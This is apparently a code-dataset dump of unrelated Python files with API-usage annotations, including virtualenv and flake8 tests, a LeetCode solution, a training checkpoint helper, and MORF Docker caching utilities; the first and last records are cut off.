] | [((279, 308), 'numpy.mean', 'np.mean', (['(predictions == truth)'], {}), '(predictions == truth)\n', (286, 308), True, 'import numpy as np\n')] |
from __future__ import absolute_import, unicode_literals
import os
import subprocess
import pytest
from virtualenv.discovery.py_info import PythonInfo
from virtualenv.run import run_via_cli
from virtualenv.util.path import Path
from virtualenv.util.subprocess import Popen
CURRENT = PythonInfo.current_system()
CREATOR_CLASSES = CURRENT.creators().key_to_class
def builtin_shows_marker_missing():
builtin_classs = CREATOR_CLASSES.get("builtin")
if builtin_classs is None:
return False
host_include_marker = getattr(builtin_classs, "host_include_marker", None)
if host_include_marker is None:
return False
marker = host_include_marker(CURRENT)
return not marker.exists()
@pytest.mark.xfail(
condition=bool(os.environ.get(str("CI_RUN"))),
strict=False,
reason="did not manage to setup CI to run with VC 14.1 C++ compiler, but passes locally",
)
@pytest.mark.skipif(
not Path(CURRENT.system_include).exists() and not builtin_shows_marker_missing(),
reason="Building C-Extensions requires header files with host python",
)
@pytest.mark.parametrize("creator", list(i for i in CREATOR_CLASSES.keys() if i != "builtin"))
def test_can_build_c_extensions(creator, tmp_path, coverage_env):
session = run_via_cli(["--creator", creator, "--seed", "app-data", str(tmp_path), "-vvv"])
coverage_env()
cmd = [
str(session.creator.script("pip")),
"install",
"--no-index",
"--no-deps",
"--disable-pip-version-check",
"-vvv",
str(Path(__file__).parent.resolve() / "greet"),
]
process = Popen(cmd)
process.communicate()
assert process.returncode == 0
process = Popen(
[str(session.creator.exe), "-c", "import greet; greet.greet('World')"],
universal_newlines=True,
stdout=subprocess.PIPE,
)
out, _ = process.communicate()
assert process.returncode == 0
assert out == "Hello World!\n"
| [
"virtualenv.util.path.Path",
"virtualenv.discovery.py_info.PythonInfo.current_system",
"virtualenv.util.subprocess.Popen"
] | [((287, 314), 'virtualenv.discovery.py_info.PythonInfo.current_system', 'PythonInfo.current_system', ([], {}), '()\n', (312, 314), False, 'from virtualenv.discovery.py_info import PythonInfo\n'), ((1611, 1621), 'virtualenv.util.subprocess.Popen', 'Popen', (['cmd'], {}), '(cmd)\n', (1616, 1621), False, 'from virtualenv.util.subprocess import Popen\n'), ((932, 960), 'virtualenv.util.path.Path', 'Path', (['CURRENT.system_include'], {}), '(CURRENT.system_include)\n', (936, 960), False, 'from virtualenv.util.path import Path\n'), ((1547, 1561), 'virtualenv.util.path.Path', 'Path', (['__file__'], {}), '(__file__)\n', (1551, 1561), False, 'from virtualenv.util.path import Path\n')] |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""=================================================================
@Project : Algorithm_YuweiYin/LeetCode-All-Solution/Python3
@File : LC-0388-Longest-Absolute-File-Path.py
@Author : [YuweiYin](https://github.com/YuweiYin)
@Date : 2022-04-20
=================================================================="""
import sys
import time
from typing import List
# import functools
"""
LeetCode - 0388 - (Medium) - Longest Absolute File Path
https://leetcode.com/problems/longest-absolute-file-path/
Description & Requirement:
Suppose we have a file system that stores both files and directories.
An example of one system in text form looks like this (with ⟶ representing the tab character):
dir
⟶ subdir1
⟶ ⟶ file1.ext
⟶ ⟶ subsubdir1
⟶ subdir2
⟶ ⟶ subsubdir2
⟶ ⟶ ⟶ file2.ext
Here, we have dir as the only directory in the root. dir contains two subdirectories,
subdir1 and subdir2. subdir1 contains a file file1.ext and subdirectory subsubdir1.
subdir2 contains a subdirectory subsubdir2, which contains a file file2.ext.
If we were to write this representation in code, it will look like this:
"dir\n\tsubdir1\n\t\tfile1.ext\n\t\tsubsubdir1\n\tsubdir2\n\t\tsubsubdir2\n\t\t\tfile2.ext".
Note that the '\n' and '\t' are the new-line and tab characters.
Every file and directory has a unique absolute path in the file system,
which is the order of directories that must be opened to reach the file/directory itself,
all concatenated by '/'s. Using the above example, the absolute path to file2.ext is
"dir/subdir2/subsubdir2/file2.ext". Each directory name consists of letters, digits,
and/or spaces. Each file name is of the form name.extension,
where name and extension consist of letters, digits, and/or spaces.
Given a string input representing the file system in the explained format,
return the length of the longest absolute path to a file in the abstracted file system.
If there is no file in the system, return 0.
Example 1:
Input: input = "dir\n\tsubdir1\n\tsubdir2\n\t\tfile.ext"
Output: 20
Explanation: We have only one file, and the absolute path is "dir/subdir2/file.ext" of length 20.
Example 2:
Input: input = "dir\n\tsubdir1\n\t\tfile1.ext\n\t\tsubsubdir1\n\tsubdir2\n\t\tsubsubdir2\n\t\t\tfile2.ext"
Output: 32
Explanation: We have two files:
"dir/subdir1/file1.ext" of length 21
"dir/subdir2/subsubdir2/file2.ext" of length 32.
We return 32 since it is the longest absolute path to a file.
Example 3:
Input: input = "a"
Output: 0
Explanation: We do not have any files, just a single directory named "a".
Constraints:
1 <= input.length <= 10^4
input may contain lowercase or uppercase English letters, a new line character '\n',
a tab character '\t', a dot '.', a space ' ', and digits.
"""
class Solution:
def lengthLongestPath(self, _input: str) -> int:
# exception case
assert isinstance(_input, str) and len(_input) >= 1
# main method: (deal with each char)
return self._lengthLongestPath(_input)
def _lengthLongestPath(self, _input: str) -> int:
directory_len = [] # the name length of each level directory/file
res = 0
cur_idx = 0
max_idx = len(_input) - 1
while cur_idx <= max_idx:
# get the file depth of the current directory
cur_depth = 1
while cur_idx <= max_idx and _input[cur_idx] == "\t":
cur_depth += 1
cur_idx += 1
# get the file name length of the current directory
is_file = False
filename_length = 0
while cur_idx <= max_idx and _input[cur_idx] != "\n":
if _input[cur_idx] == ".":
is_file = True
filename_length += 1
cur_idx += 1
# now _input[cur_idx] == "\n", skip it
cur_idx += 1
# combine parent directory and the current filename
while len(directory_len) >= cur_depth:
directory_len.pop()
if len(directory_len) > 0:
filename_length += directory_len[-1] + 1 # parent directory and "/"
# if is_file, update res; else, update directory_len
if is_file:
res = max(res, filename_length)
else:
directory_len.append(filename_length)
return res
def main():
# Example 1: Output: 20
# _input = "dir\n\tsubdir1\n\tsubdir2\n\t\tfile.ext"
# Example 2: Output: 32
_input = "dir\n\tsubdir1\n\t\tfile1.ext\n\t\tsubsubdir1\n\tsubdir2\n\t\tsubsubdir2\n\t\t\tfile2.ext"
# Example 3: Output: 0
# _input = "a"
# init instance
solution = Solution()
# run & time
start = time.process_time()
ans = solution.lengthLongestPath(_input)
end = time.process_time()
# show answer
print('\nAnswer:')
print(ans)
# show time consumption
print('Running Time: %.5f ms' % ((end - start) * 1000))
if __name__ == "__main__":
sys.exit(main())
| [
"time.process_time"
] | [((4946, 4965), 'time.process_time', 'time.process_time', ([], {}), '()\n', (4963, 4965), False, 'import time\n'), ((5021, 5040), 'time.process_time', 'time.process_time', ([], {}), '()\n', (5038, 5040), False, 'import time\n')] |
import os
import sys
import warnings
warnings.warn(
"pathod and pathoc modules are deprecated, see https://github.com/mitmproxy/mitmproxy/issues/4273",
DeprecationWarning,
stacklevel=2
)
def print_tool_deprecation_message():
print("####", file=sys.stderr)
print(f"### {os.path.basename(sys.argv[0])} is deprecated and will not be part of future mitmproxy releases!", file=sys.stderr)
print("### See https://github.com/mitmproxy/mitmproxy/issues/4273 for more information.", file=sys.stderr)
print("####", file=sys.stderr)
print("", file=sys.stderr)
| [
"warnings.warn",
"os.path.basename"
] | [((39, 196), 'warnings.warn', 'warnings.warn', (['"""pathod and pathoc modules are deprecated, see https://github.com/mitmproxy/mitmproxy/issues/4273"""', 'DeprecationWarning'], {'stacklevel': '(2)'}), "(\n 'pathod and pathoc modules are deprecated, see https://github.com/mitmproxy/mitmproxy/issues/4273'\n , DeprecationWarning, stacklevel=2)\n", (52, 196), False, 'import warnings\n'), ((293, 322), 'os.path.basename', 'os.path.basename', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (309, 322), False, 'import os\n')] |
import unittest
from model.curseur import Curseur
from model.pion import PionBlanc, PionNoir
from model.qubic import Qubic
class TestQubic(unittest.TestCase):
def test_poser(self):
q = Qubic()
q.poser((0, 7, 0))
self.assertTrue(q.get_pion((0, 0, 0)) == PionBlanc)
self.assertFalse(q.get_pion((0, 1, 0)))
q.poser((0, 7, 0))
self.assertTrue(q.get_pion((0, 0, 0)) == PionBlanc)
self.assertTrue(q.get_pion((0, 1, 0)) == PionNoir)
self.assertTrue(q.get_pion((0, 2, 0)) is None)
def test_tour(self):
q = Qubic()
i = 0
for x in range(len(q)):
for y in range(len(q)):
for z in range(len(q)):
if q.fini:
self.assertFalse(q.tour_blanc() or q.tour_noir())
elif i % 2 == 0:
self.assertTrue(q.tour_blanc() and not q.tour_noir(), "au tour {}".format(i))
else:
self.assertTrue(q.tour_noir() and not q.tour_blanc(), "au tour {}".format(i))
q.poser((x, y, z))
i += 1
self.assertFalse(q.tour_blanc() or q.tour_noir())
def test_annule_pose(self):
q = Qubic(gravite=False)
self.make_win(q)
q.annule_coup()
self.assertTrue(q.get_pion((len(q) - 1, 0, 0)) is None)
self.assertFalse(q.fini)
def make_win(self, q):
for x, z in zip(range(len(q)), range(len(q))[:0:-1]):
q.poser((x, 0, z))
q.poser((x, 1, z))
self.assertFalse(q.fini)
q.poser((len(q) - 1, 0, 0))
self.assertTrue(q.fini)
def test_valid_pos(self):
q = Qubic()
c = Curseur((4, 4, 4))
for x in range(len(q)):
for y in range(len(q)):
for z in range(len(q)):
self.assertTrue(q.valid_pos((x, y, z)))
self.assertFalse(q.valid_pos((-5, 1, 1)))
self.assertFalse(q.valid_pos((1, 4, 1)))
def test_reset(self):
pass
def test_victoire(self):
q = Qubic(gravite=False)
for x in range(len(q)):
q.poser((x, x, x))
self.assertFalse(q.fini, "at pos {}".format(x))
q.reset()
self.make_win(q)
q.reset()
for x in range(len(q)):
q.plateau[x][x][x] = PionBlanc()
self.assertTrue(q.win((len(q) - 1,) * 3))
q.reset()
for x in range(len(q)):
q.plateau[x][len(q) - 1 - x][x] = PionBlanc()
self.assertTrue(q.win((len(q) - 1, 0, len(q) - 1)))
q.reset()
for x in list(range(len(q))):
q.plateau[x][x][len(q) - 1 - x] = PionBlanc()
self.assertTrue((len(q), len(q), 0))
q.reset()
for x in list(range(len(q))):
q.plateau[x][len(q) - 1 - x][len(q) - 1 - x] = PionBlanc()
self.assertTrue((len(q), len(q), 0))
if __name__ == '__main__':
unittest.main()
| [
"unittest.main",
"model.pion.PionBlanc",
"model.qubic.Qubic",
"model.curseur.Curseur"
] | [((2433, 2448), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2446, 2448), False, 'import unittest\n'), ((191, 198), 'model.qubic.Qubic', 'Qubic', ([], {}), '()\n', (196, 198), False, 'from model.qubic import Qubic\n'), ((522, 529), 'model.qubic.Qubic', 'Qubic', ([], {}), '()\n', (527, 529), False, 'from model.qubic import Qubic\n'), ((1016, 1036), 'model.qubic.Qubic', 'Qubic', ([], {'gravite': '(False)'}), '(gravite=False)\n', (1021, 1036), False, 'from model.qubic import Qubic\n'), ((1401, 1408), 'model.qubic.Qubic', 'Qubic', ([], {}), '()\n', (1406, 1408), False, 'from model.qubic import Qubic\n'), ((1415, 1433), 'model.curseur.Curseur', 'Curseur', (['(4, 4, 4)'], {}), '((4, 4, 4))\n', (1422, 1433), False, 'from model.curseur import Curseur\n'), ((1711, 1731), 'model.qubic.Qubic', 'Qubic', ([], {'gravite': '(False)'}), '(gravite=False)\n', (1716, 1731), False, 'from model.qubic import Qubic\n'), ((1926, 1937), 'model.pion.PionBlanc', 'PionBlanc', ([], {}), '()\n', (1935, 1937), False, 'from model.pion import PionBlanc, PionNoir\n'), ((2058, 2069), 'model.pion.PionBlanc', 'PionBlanc', ([], {}), '()\n', (2067, 2069), False, 'from model.pion import PionBlanc, PionNoir\n'), ((2206, 2217), 'model.pion.PionBlanc', 'PionBlanc', ([], {}), '()\n', (2215, 2217), False, 'from model.pion import PionBlanc, PionNoir\n'), ((2352, 2363), 'model.pion.PionBlanc', 'PionBlanc', ([], {}), '()\n', (2361, 2363), False, 'from model.pion import PionBlanc, PionNoir\n')] |
from typing import Any, Dict, Type, TypeVar, Union
import attr
from ..models.sherpa_job_bean import SherpaJobBean
from ..types import UNSET, Unset
T = TypeVar("T", bound="ProjectStatus")
@attr.s(auto_attribs=True)
class ProjectStatus:
""" """
project_name: str
status: str
pending_job: Union[Unset, SherpaJobBean] = UNSET
def to_dict(self) -> Dict[str, Any]:
project_name = self.project_name
status = self.status
pending_job: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.pending_job, Unset):
pending_job = self.pending_job.to_dict()
field_dict: Dict[str, Any] = {}
field_dict.update(
{
"projectName": project_name,
"status": status,
}
)
if pending_job is not UNSET:
field_dict["pendingJob"] = pending_job
return field_dict
@classmethod
def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
d = src_dict.copy()
project_name = d.pop("projectName")
status = d.pop("status")
_pending_job = d.pop("pendingJob", UNSET)
pending_job: Union[Unset, SherpaJobBean]
if isinstance(_pending_job, Unset):
pending_job = UNSET
else:
pending_job = SherpaJobBean.from_dict(_pending_job)
project_status = cls(
project_name=project_name,
status=status,
pending_job=pending_job,
)
return project_status
| [
"attr.s",
"typing.TypeVar"
] | [((154, 189), 'typing.TypeVar', 'TypeVar', (['"""T"""'], {'bound': '"""ProjectStatus"""'}), "('T', bound='ProjectStatus')\n", (161, 189), False, 'from typing import Any, Dict, Type, TypeVar, Union\n'), ((193, 218), 'attr.s', 'attr.s', ([], {'auto_attribs': '(True)'}), '(auto_attribs=True)\n', (199, 218), False, 'import attr\n')] |
from os import path, makedirs, walk ,remove, scandir, unlink
from numpy import inf
from torch import save as t_save
from lib.utils import sort_human, BOLD, CLR
class EarlyStopping:
def __init__(self, log_path, patience=7, model=None, verbose=False, exp_tag=""):
"""Early stops the training if validation loss doesn't improve after a given patience.
Args:
patience (int): How long to wait after last time validation loss improved.
Default: 7
verbose (bool): If True, prints a message for each validation loss improvement.
Default: False
"""
self.patience = patience
self.verbose = verbose
self.counter = 0
self.best_score = None
self.early_stop = False
self.val_loss_min = inf
self.global_min_loss = inf
save_dir = f"{log_path}/save_model/{exp_tag}"
self.save_path = save_dir
if not path.isdir(save_dir):
makedirs(save_dir)
save_dir = f"{self.save_path}/best/"
if not path.isdir(save_dir):
makedirs(save_dir)
if model is not None:
self.meta_info = {'meta':(model.encoder_params,\
model.decoder_params,\
model.n_frames_input,\
model.n_frames_output)}
else:
self.meta_info = {}
def __str__(self):
return '\n'.join(f"{k}={v}" for k, v in vars(self).items())
def __call__(self, val_loss, model, epoch, step=0):
"""Summary
Args:
val_loss (TYPE): Description
model (TYPE): Description
epoch (TYPE): Description
"""
score = -val_loss
model.update(self.meta_info)
if step != 0:
self.save_checkpoint(val_loss, model, epoch, step)
else:
if self.best_score is None:
self.best_score = score
self.save_checkpoint(val_loss, model, epoch, step)
elif score < self.best_score:
self.counter += 1
if self.counter >= self.patience:
self.early_stop = True
print(f"{BOLD}[*] early stopping at epoch {epoch} !{CLR}")
else:
print(f"[*] early stopping counter: {BOLD}{self.counter}/{self.patience}{CLR}")
# self.del_old_models()
else:
self.best_score = score
self.save_checkpoint(val_loss, model, epoch, step)
self.counter = 0
t_save(model, f"{self.save_path}/LAST_checkpoint_{epoch}_{step}_{val_loss:.6f}.pth.tar")
def del_old_models(self, keep=10):
_, _, files = next(walk(self.save_path))
file_count = len(files)
if file_count > keep:
for old_model in sort_human(files)[:keep//2]:
remove(path.join(self.save_path, old_model))
def save_checkpoint(self, val_loss, model, epoch, step=0):
"""Saves model when validation loss decrease
Args:
val_loss (TYPE): Description
model (TYPE): Description
epoch (TYPE): Description
"""
# save best model
if step != 0:
save_flag = "IE"
print(f"[$] saveing model at step: {step} in epoch {epoch}")
self.del_old_models()
t_save(model, f"{self.save_path}/{save_flag}checkpoint_{epoch}_{step}_{val_loss}.pth.tar")
else:
if val_loss < self.global_min_loss:
if self.verbose:
print(f"[*] validation loss record {BOLD}{val_loss}{CLR} in epoch: {BOLD}{epoch}{CLR}@{step}")
self.global_min_loss = val_loss
save_flag = "best/"
for file in scandir(f"{self.save_path}/{save_flag}"):
unlink(file.path)
else:
save_flag = ""
#self.del_old_models()
t_save(model, f"{self.save_path}/{save_flag}checkpoint_{epoch}_{step}_{val_loss}.pth.tar")
self.val_loss_min = val_loss
| [
"lib.utils.sort_human",
"os.makedirs",
"os.scandir",
"os.path.join",
"os.path.isdir",
"os.unlink",
"torch.save",
"os.walk"
] | [((975, 995), 'os.path.isdir', 'path.isdir', (['save_dir'], {}), '(save_dir)\n', (985, 995), False, 'from os import path, makedirs, walk, remove, scandir, unlink\n'), ((1009, 1027), 'os.makedirs', 'makedirs', (['save_dir'], {}), '(save_dir)\n', (1017, 1027), False, 'from os import path, makedirs, walk, remove, scandir, unlink\n'), ((1088, 1108), 'os.path.isdir', 'path.isdir', (['save_dir'], {}), '(save_dir)\n', (1098, 1108), False, 'from os import path, makedirs, walk, remove, scandir, unlink\n'), ((1122, 1140), 'os.makedirs', 'makedirs', (['save_dir'], {}), '(save_dir)\n', (1130, 1140), False, 'from os import path, makedirs, walk, remove, scandir, unlink\n'), ((2665, 2757), 'torch.save', 't_save', (['model', 'f"""{self.save_path}/LAST_checkpoint_{epoch}_{step}_{val_loss:.6f}.pth.tar"""'], {}), "(model,\n f'{self.save_path}/LAST_checkpoint_{epoch}_{step}_{val_loss:.6f}.pth.tar')\n", (2671, 2757), True, 'from torch import save as t_save\n'), ((2821, 2841), 'os.walk', 'walk', (['self.save_path'], {}), '(self.save_path)\n', (2825, 2841), False, 'from os import path, makedirs, walk, remove, scandir, unlink\n'), ((3480, 3579), 'torch.save', 't_save', (['model', 'f"""{self.save_path}/{save_flag}checkpoint_{epoch}_{step}_{val_loss}.pth.tar"""'], {}), "(model,\n f'{self.save_path}/{save_flag}checkpoint_{epoch}_{step}_{val_loss}.pth.tar'\n )\n", (3486, 3579), True, 'from torch import save as t_save\n'), ((4071, 4170), 'torch.save', 't_save', (['model', 'f"""{self.save_path}/{save_flag}checkpoint_{epoch}_{step}_{val_loss}.pth.tar"""'], {}), "(model,\n f'{self.save_path}/{save_flag}checkpoint_{epoch}_{step}_{val_loss}.pth.tar'\n )\n", (4077, 4170), True, 'from torch import save as t_save\n'), ((2934, 2951), 'lib.utils.sort_human', 'sort_human', (['files'], {}), '(files)\n', (2944, 2951), False, 'from lib.utils import sort_human, BOLD, CLR\n'), ((3893, 3933), 'os.scandir', 'scandir', (['f"""{self.save_path}/{save_flag}"""'], {}), "(f'{self.save_path}/{save_flag}')\n", (3900, 3933), False, 'from os import path, makedirs, walk, remove, scandir, unlink\n'), ((2986, 3022), 'os.path.join', 'path.join', (['self.save_path', 'old_model'], {}), '(self.save_path, old_model)\n', (2995, 3022), False, 'from os import path, makedirs, walk, remove, scandir, unlink\n'), ((3955, 3972), 'os.unlink', 'unlink', (['file.path'], {}), '(file.path)\n', (3961, 3972), False, 'from os import path, makedirs, walk, remove, scandir, unlink\n')] |
"""
This file tests the TC100 error:
>> Missing 'from __future__ import annotations' import
The idea is that we should raise one of these errors if a file contains any type-checking imports and one is missing.
One thing to note: futures imports should always be at the top of a file, so we only need to check one line.
"""
import pytest
from flake8_type_checking.codes import TC100
from tests import _get_error, mod
examples = [
# No errors
('', set()),
('if TYPE_CHECKING:\n\tx = 2', set()),
# Unused import
('if TYPE_CHECKING:\n\tfrom typing import Dict', {'1:0 ' + TC100}),
('if TYPE_CHECKING:\n\tfrom typing import Dict, Any', {'1:0 ' + TC100}),
(f'if TYPE_CHECKING:\n\timport {mod}', {'1:0 ' + TC100}),
(f'if TYPE_CHECKING:\n\tfrom {mod} import constants', {'1:0 ' + TC100}),
# Used imports
('if TYPE_CHECKING:\n\tfrom typing import Dict\nx = Dict', set()),
('if TYPE_CHECKING:\n\tfrom typing import Dict, Any\nx, y = Dict, Any', set()),
(f'if TYPE_CHECKING:\n\timport {mod}\nx = {mod}.constants.TC001', set()),
(f'if TYPE_CHECKING:\n\tfrom {mod} import constants\nprint(constants)', set()),
# Import used for AnnAssign
('if TYPE_CHECKING:\n\tfrom typing import Dict\nx: Dict[str, int]', {'1:0 ' + TC100}),
('if TYPE_CHECKING:\n\tfrom typing import Dict\nx: Dict[str, int] = {}', {'1:0 ' + TC100}),
# Import used for arg
('if TYPE_CHECKING:\n\tfrom typing import Dict\ndef example(x: Dict[str, int]):\n\tpass', {'1:0 ' + TC100}),
('if TYPE_CHECKING:\n\tfrom typing import Dict\ndef example(x: Dict[str, int] = {}):\n\tpass', {'1:0 ' + TC100}),
# Import used for returns
('if TYPE_CHECKING:\n\tfrom typing import Dict\ndef example() -> Dict[str, int]:\n\tpass', {'1:0 ' + TC100}),
# Probably not much point in adding many more test cases, as the logic for TC100
# is not dependent on the type of annotation assignments; it's purely concerned with
# whether an ast.Import or ast.ImportFrom exists within a type checking block
]
@pytest.mark.parametrize('example, expected', examples)
def test_TC100_errors(example, expected):
assert _get_error(example, error_code_filter='TC100') == expected
| [
"pytest.mark.parametrize",
"tests._get_error"
] | [((2040, 2094), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""example, expected"""', 'examples'], {}), "('example, expected', examples)\n", (2063, 2094), False, 'import pytest\n'), ((2148, 2194), 'tests._get_error', '_get_error', (['example'], {'error_code_filter': '"""TC100"""'}), "(example, error_code_filter='TC100')\n", (2158, 2194), False, 'from tests import _get_error, mod\n')] |
# Copyright (c) 2018 The Regents of the University of Michigan
# and the University of Pennsylvania
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Functions for caching data for MORF jobs.
"""
import os
import subprocess
import shutil
from urllib.parse import urlparse
import logging
from morf.utils.docker import load_docker_image
from morf.utils.log import set_logger_handlers, execute_and_log_output
from morf.utils.s3interface import sync_s3_bucket_cache
module_logger = logging.getLogger(__name__)
def make_course_session_cache_dir_fp(job_config, bucket, data_dir, course, session):
fp = os.path.join(job_config.cache_dir, bucket, data_dir, course, session)
return fp
def update_raw_data_cache(job_config):
"""
Update the raw data cache using the parameters in job_config; if job_config contains multiple raw data buckets, cache all of them.
:param job_config: MorfJobConfig object.
:return:
"""
# cache each bucket in a named directory within job_cache_dir
for raw_data_bucket in job_config.raw_data_buckets:
sync_s3_bucket_cache(job_config, raw_data_bucket)
return
def update_proc_data_cache(job_config):
"""
Update the processed data cache using the parameters in job_config. Assumes job_config contains only a single proc_data_bucket.
:param job_config: MorfJobConfig object.
:return:
"""
proc_data_bucket = getattr(job_config, "proc_data_bucket", None)
sync_s3_bucket_cache(job_config, proc_data_bucket)
return
def fetch_from_cache(job_config, cache_file_path, dest_dir):
"""
Fetch a file from the cache for job_config into dest_dir, if it exists.
:param job_config:
:param cache_file_path: string, relative path to file in cache (this is identical to the directory path in s3; e.g. "/bucket/path/to/somefile.csv"
:param dest_dir: absolute path of directory to fetch file into (will be created if not exists)
:return: path to fetched file (string); return None if cache is not used.
"""
logger = set_logger_handlers(module_logger, job_config)
logger.info("fetching file {} from cache".format(cache_file_path))
abs_cache_file_path = os.path.join(getattr(job_config, "cache_dir", None), cache_file_path)
if hasattr(job_config, "cache_dir") and os.path.exists(abs_cache_file_path):
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
dest_fp = shutil.copy(abs_cache_file_path, dest_dir)
else:
logger.warning("file {} does not exist in cache".format(abs_cache_file_path))
dest_fp = None
return dest_fp
def docker_cloud_login(job_config):
"""
Log into docker cloud using creds in job_config.
:param job_config: MorfJobConfig object.
:return: None
"""
cmd = "docker login --username={} --password={}".format(job_config.docker_cloud_username, job_config.docker_cloud_password)
logger = set_logger_handlers(module_logger, job_config)
execute_and_log_output(cmd, logger)
return
def docker_cloud_push(job_config, image_uuid):
"""
Push image to Docker Cloud repo in job_config; tagging the image with its morf_id.
:param job_config: MorfJobConfig object
:param image_uuid: Docker image uuid
:return: None
"""
logger = set_logger_handlers(module_logger, job_config)
docker_cloud_repo_and_tag_path = "{}:{}".format(job_config.docker_cloud_repo, job_config.morf_id)
# tag the docker image using the morf_id
tag_cmd = "docker tag {} {}".format(image_uuid, docker_cloud_repo_and_tag_path)
execute_and_log_output(tag_cmd, logger)
# push the image to docker cloud
push_cmd = "docker push {}".format(docker_cloud_repo_and_tag_path)
execute_and_log_output(push_cmd, logger)
return docker_cloud_repo_and_tag_path
def cache_to_docker_hub(job_config, dir, image_name):
"""
Push image to MORF repo in Docker Hub.
:param job_config: MorfJobConfig object.
:return: None
"""
logger = set_logger_handlers(module_logger, job_config)
image_uuid = load_docker_image(dir, job_config, logger, image_name)
docker_cloud_login(job_config)
docker_cloud_repo_and_tag_path = docker_cloud_push(job_config, image_uuid)
return docker_cloud_repo_and_tag_path
| [
"logging.getLogger",
"os.path.exists",
"os.makedirs",
"morf.utils.log.set_logger_handlers",
"os.path.join",
"morf.utils.s3interface.sync_s3_bucket_cache",
"morf.utils.docker.load_docker_image",
"shutil.copy",
"morf.utils.log.execute_and_log_output"
] | [((1492, 1519), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1509, 1519), False, 'import logging\n'), ((1616, 1685), 'os.path.join', 'os.path.join', (['job_config.cache_dir', 'bucket', 'data_dir', 'course', 'session'], {}), '(job_config.cache_dir, bucket, data_dir, course, session)\n', (1628, 1685), False, 'import os\n'), ((2462, 2512), 'morf.utils.s3interface.sync_s3_bucket_cache', 'sync_s3_bucket_cache', (['job_config', 'proc_data_bucket'], {}), '(job_config, proc_data_bucket)\n', (2482, 2512), False, 'from morf.utils.s3interface import sync_s3_bucket_cache\n'), ((3043, 3089), 'morf.utils.log.set_logger_handlers', 'set_logger_handlers', (['module_logger', 'job_config'], {}), '(module_logger, job_config)\n', (3062, 3089), False, 'from morf.utils.log import set_logger_handlers, execute_and_log_output\n'), ((3923, 3969), 'morf.utils.log.set_logger_handlers', 'set_logger_handlers', (['module_logger', 'job_config'], {}), '(module_logger, job_config)\n', (3942, 3969), False, 'from morf.utils.log import set_logger_handlers, execute_and_log_output\n'), ((3974, 4009), 'morf.utils.log.execute_and_log_output', 'execute_and_log_output', (['cmd', 'logger'], {}), '(cmd, logger)\n', (3996, 4009), False, 'from morf.utils.log import set_logger_handlers, execute_and_log_output\n'), ((4289, 4335), 'morf.utils.log.set_logger_handlers', 'set_logger_handlers', (['module_logger', 'job_config'], {}), '(module_logger, job_config)\n', (4308, 4335), False, 'from morf.utils.log import set_logger_handlers, execute_and_log_output\n'), ((4571, 4610), 'morf.utils.log.execute_and_log_output', 'execute_and_log_output', (['tag_cmd', 'logger'], {}), '(tag_cmd, logger)\n', (4593, 4610), False, 'from morf.utils.log import set_logger_handlers, execute_and_log_output\n'), ((4723, 4763), 'morf.utils.log.execute_and_log_output', 'execute_and_log_output', (['push_cmd', 'logger'], {}), '(push_cmd, logger)\n', (4745, 4763), False, 'from morf.utils.log import set_logger_handlers, execute_and_log_output\n'), ((4997, 5043), 'morf.utils.log.set_logger_handlers', 'set_logger_handlers', (['module_logger', 'job_config'], {}), '(module_logger, job_config)\n', (5016, 5043), False, 'from morf.utils.log import set_logger_handlers, execute_and_log_output\n'), ((5061, 5115), 'morf.utils.docker.load_docker_image', 'load_docker_image', (['dir', 'job_config', 'logger', 'image_name'], {}), '(dir, job_config, logger, image_name)\n', (5078, 5115), False, 'from morf.utils.docker import load_docker_image\n'), ((2080, 2129), 'morf.utils.s3interface.sync_s3_bucket_cache', 'sync_s3_bucket_cache', (['job_config', 'raw_data_bucket'], {}), '(job_config, raw_data_bucket)\n', (2100, 2129), False, 'from morf.utils.s3interface import sync_s3_bucket_cache\n'), ((3301, 3336), 'os.path.exists', 'os.path.exists', (['abs_cache_file_path'], {}), '(abs_cache_file_path)\n', (3315, 3336), False, 'import os\n'), ((3431, 3473), 'shutil.copy', 'shutil.copy', (['abs_cache_file_path', 'dest_dir'], {}), '(abs_cache_file_path, dest_dir)\n', (3442, 3473), False, 'import shutil\n'), ((3353, 3377), 'os.path.exists', 'os.path.exists', (['dest_dir'], {}), '(dest_dir)\n', (3367, 3377), False, 'import os\n'), ((3391, 3412), 'os.makedirs', 'os.makedirs', (['dest_dir'], {}), '(dest_dir)\n', (3402, 3412), False, 'import os\n')] |
import functools
def memoise(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
if not wrapper.hasResult:
wrapper.result = func(*args, **kwargs)
wrapper.hasResult = True
return wrapper.result
wrapper.result = None
wrapper.hasResult = False
return wrapper
| [
"functools.wraps"
] | [((42, 63), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (57, 63), False, 'import functools\n')] |
import datetime as suan
def al(text):
try:
zaman=suan.datetime.now()
saat=zaman.strftime("%H")
dakika=zaman.strftime("%M")
saniye=zaman.strftime("%S")
gun=zaman.strftime("%A")
ay=zaman.strftime("%B")
yil=zaman.strftime("%Y")
if gun=="Monday":
gun="Pazartesi"
elif gun=="Tuesday":
gun="Salı"
elif gun=="Wednesday":
gun="Çarşamba"
elif gun=="Thursday":
gun="Perşembe"
elif gun=="Friday":
gun="Cuma"
